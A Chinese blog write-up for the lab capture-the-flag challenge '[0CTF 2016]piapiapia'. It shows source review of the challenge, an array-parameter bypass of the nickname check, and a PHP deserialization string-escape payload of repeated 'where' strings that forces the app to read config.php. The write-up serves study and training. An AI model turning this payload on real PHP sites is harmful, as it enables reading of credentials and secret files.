[0CTF 2016]piapiapia

于 2021-12-08 23:03:28 发布
阅读量936 收藏 2
点赞数 1
分类专栏: 学习笔记 网络安全 文章标签: php 开发语言 后端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45808483/article/details/121803256
版权

知识点:

信息泄露

PHP反序列化字符串逃逸(替换后导致字符串变长)

参数传递数组绕过字符串检测

题目链接

BUUCTF在线评测

1.启动环境,一个登录框

image-20211208212657892

2.dirsearch扫描

先拿dirsearch扫描一遍,第一次什么也没有扫到,全部都是429。加上延时并且调一下线程再扫描一次,这一次我们扫到了压缩文件,但是普通的php文件扫不到~~。

image-20211208212615163

<!--more-->

3.下载源码审计

image-20211208213157549

打开config.php,我们发现了flag

image-20211208213426231

继续分析源码,发现三处敏感函数:

第一个:

unserialize() 对单一的已序列化的变量进行操作,将其转换回 PHP 的值。

参数:

序列化后的字符串。

若被反序列化的变量是一个对象,在成功地重新构造对象之后,PHP 会自动地试图去调用 __wakeup() 成员函数(如果存在的话)。

返回值

返回的是转换之后的值,可为 integer、float、string、array 或 object。

如果传递的字符串不可反序列化,则返回 false,并产生一个 E_NOTICE

第二个:

file_get_contents — 将整个文件读入一个字符串

image-20211208221156183

第三个:

serialize() 返回字符串,此字符串包含了表示 value 的字节流,可以存储于任何地方。

这有利于存储或传递 PHP 的值,同时不丢失其类型和结构。

想要将已序列化的字符串变回 PHP 的值,可使用 unserialize()serialize() 可处理除了 resource 之外的任何类型。甚至可以 serialize() 那些包含了指向其自身引用的数组。你正 serialize() 的数组/对象中的引用也将被存储。

image-20211208221307187

推测应该是让我们通过file_get_contents函数去请求config.php文件

如果能让photo为config.php,而这数值来自$profile的反序列化,查看$profile

public function update_profile($username, $new_profile) {
        $username = parent::filter($username);
        $new_profile = parent::filter($new_profile);
​
        $where = "username = '$username'";
        return parent::update($this->table, 'profile', $new_profile, $where);
    }

发现有过滤

public function filter($string) {
        $escape = array('\'', '\\\\');
        $escape = '/' . implode('|', $escape) . '/';
        $string = preg_replace($escape, '_', $string);
​
        $safe = array('select', 'insert', 'update', 'delete', 'where');
        $safe = '/' . implode('|', $safe) . '/i';
        return preg_replace($safe, 'hacker', $string);
    }

要进行字符串的逃逸应该先考虑用nickname来构造字符串逃逸photo应为nickname在其前面 然后发现nickname有正则过滤,考虑用数组来进行绕过

if(preg_match('/[^a-zA-Z0-9_]/', $_POST['nickname']) || strlen($_POST['nickname']) > 10)
            die('Invalid nickname');

数组绕过后就考虑进行逃逸将photo挤出去 所以我们需要构造nickname的参数值为";}s:5:"photo";s:10:"config.php";} 这里为什么要在前面加一个}呢???,因为为了绕过nickname的正则匹配我们将其构造成了数组,数组在反序列化要进行闭合,可以尝试一下 构造代码

<?php
function filter($str){
    return str_replace('bb', 'ccc', $str);
}
class A{
    public $name='aaaa';
    public $pass='123456';
    public $nickname = array('a' => 'Apple' ,'b' => 'banana' , 'c' => 'Coconut');
}
$AA=new A();
echo serialize($AA)."\n";
// $res=filter(serialize($AA));
// $c=unserialize($res);
// echo $c->pass;
?>

运行结果发现数组位置进行了闭合

img

这就是为啥上面要先进行}在逃逸 构造我们想要的内容后要进行逃逸,我们发现过滤的时候将where改成了hacker,进行了字符串拓展增建了一个字符串,我们构造的字符串长度为34所以我们要构造34个where进行逃逸

参考文章: 

代码审计和原理分析可以参考一下两篇文章,阅读完毕后本人学习到了很多,十分感谢各位前辈!

php反序列化漏洞 

[0CTF 2016]piapiapia WP(详细)

4.漏洞利用

我们先通过 register.php 注册一个账号登录,上传图片抓包

payload:

wherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewhere";}s:5:"photo";s:10:"config.php";}

在nickname位置输入payload抓包,把nickname改成nickname[] 数组

image-20211208220100971

然后点超链接到profile.php,看源代码找到image里面的base64字符串(因为之前分析file_get_contents的时候,它的外面还有一层base64_encode,而且它是photo参数,就是图片)

image-20211208220339588

解码获得flag

image-20211208220408332

ErYao7
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
[0CTF-2016] piapiapia
Logerrik的博客
05-11 434
[0CTF-2016] piapiapia PHP反序列化字符逃逸 1.www.zip源码泄露 试了下发现不太像sql注入,扫下目录发现www.zip泄露 最近好多题都是这种源码泄露,建议字典齐全一点,不然扫不出来真的难受 2.源码 源码还挺多 config.php里面看到有flag,最后目标应该就是读取到config里面的flag就可以了 $config[‘hostname’] = ‘127.0.0.1’; $config[‘username’] = ‘root’; $config[‘password’
php反序列化长度变化尾部字符串逃逸(0CTF-2016-piapiapia)
12-20
一个很可爱的登录界面: 进行一下目录扫描,发现源码泄露www.zip,把源码给出: ... <?... if($_SESSION['username']) { ... if($_POST['username'] && $_POST['password']) { ... if(strlen($username
BUUCTF [0CTF 2016] piapiapia
Senimo
01-05 791
BUUCTF [0CTF 2016] piapiapia 考点 php代码审计 反序列化字符串逃逸 启动环境: 首先是个登录框,只有登陆功能,尝试了一波弱密码和万能密码: 猜测可能不是,继续对题目进行信息收集,使用ctf-wscan扫描网站目录: python3 ctf-wscan.py http://xxx.cn/ 得到扫描结果: 查看到其存在注册页面: 访问update.php页面: 需要先进行登陆。 以及其存在源码泄露,下载www.zip到本地: 对源码进行分析,其中static中存
[0CTF 2016]piapiapia(反序列化逃逸)
paidx0
09-02 732
偷了三天懒没有学习,哈哈哈,通宵看完了扫黑风暴 开始做题 打开环境,第一时间以为是SQL注入,用sqlmap跑了一下,并不是 找了一下也没有什么东西,就去扫一下他的敏感目录,扫到www.zip,下载下来 先用Seay快速审计一下,再去细看代码逻辑 知识点 1、代码审计 2、反序列化逃逸 来一起看看代码吧 先看看可能存在文件读取的profile.php 首先想到的就是利用反序列化,然后文件读取,继续跟进 $profile = $user->show_profile($username); 再看in
2016华山杯ctf安卓题目
06-17
【标题】2016华山杯CTF(Capture The Flag)是一场专注于网络安全竞技的赛事,其中的安卓题目展示了该领域内的各种挑战与技术深度。CTF比赛通常包括逆向工程、密码学、Web安全、移动安全等多个方向,而安卓题目则...
CTF Writeups 2016.9.29
09-29
CTF Writeups 2016.9.29
0ctf_2016_warmup
05-17
20160ctf的pwn题。
Internetwache-CTF-2016, Internetwache CTF 2016存储库.zip
09-18
Internetwache-CTF-2016, Internetwache CTF 2016存储库 Internetwache CTF 2016这是 Internetwache CTF 2016存储库。 它包含所有用于构建和承载CTF的文件。工具和注释。 ctf.db 包含最终的记分板信息。的详细信息...
Internetwache-CTF-2016:Internetwache CTF 2016存储库
05-03
Internetwache CTF 2016 这是Internetwache CTF 2016存储库。 它包含用于构建和托管CTF的所有文件,工具和说明。 ctf.db包含最终的记分板信息。 CTF详细信息 日期:欧洲中部时间2月20日12:00 —欧洲中部时间2月22日...
0con&0ctf 2016 - 安全技术资料汇总(共14份).zip
02-05
CTF与安全人才培养.pdf From_good_to_best.pdf WiFi_安全感知系统.pdf 乙方安全服务力量之唤醒.pdf 互联网安全专业人才培养.pdf 北人南观:攻击矩阵中的数据纽带.pdf 基于业务场景的安全测试.pdf 威胁情报...
Google-CTF-2016-Stego.pcap数据包
10-08
Google-CTF-2016-Stego.pcap数据包
CTF真题-Dest0g3CTF2022招新赛
06-01
CTF真题-Dest0g3CTF2022招新赛,来自BUUCTF。
CTF100题.docx
05-25
CTF是一种流行的信息安全竞赛形式,其英文名可直译为“夺得Flag”,也可意译为“夺旗赛”。其大致流程是,参赛团队之间通过进行攻防对抗、程序分析等形式,率先从主办方给出的比赛环境中得到一串具有一定格式的字符...
ctf从0到1电子书
最新发布
12-14
《CTF从0到1》是一本针对CTF(Capture The Flag)竞赛的电子书,旨在帮助初学者快速入门和提高他们的技能。该书包括了CTF竞赛的基础知识、技巧和策略,并提供了详细的实例和实战练习,帮助读者从零开始逐步建立起...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

ErYao7

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值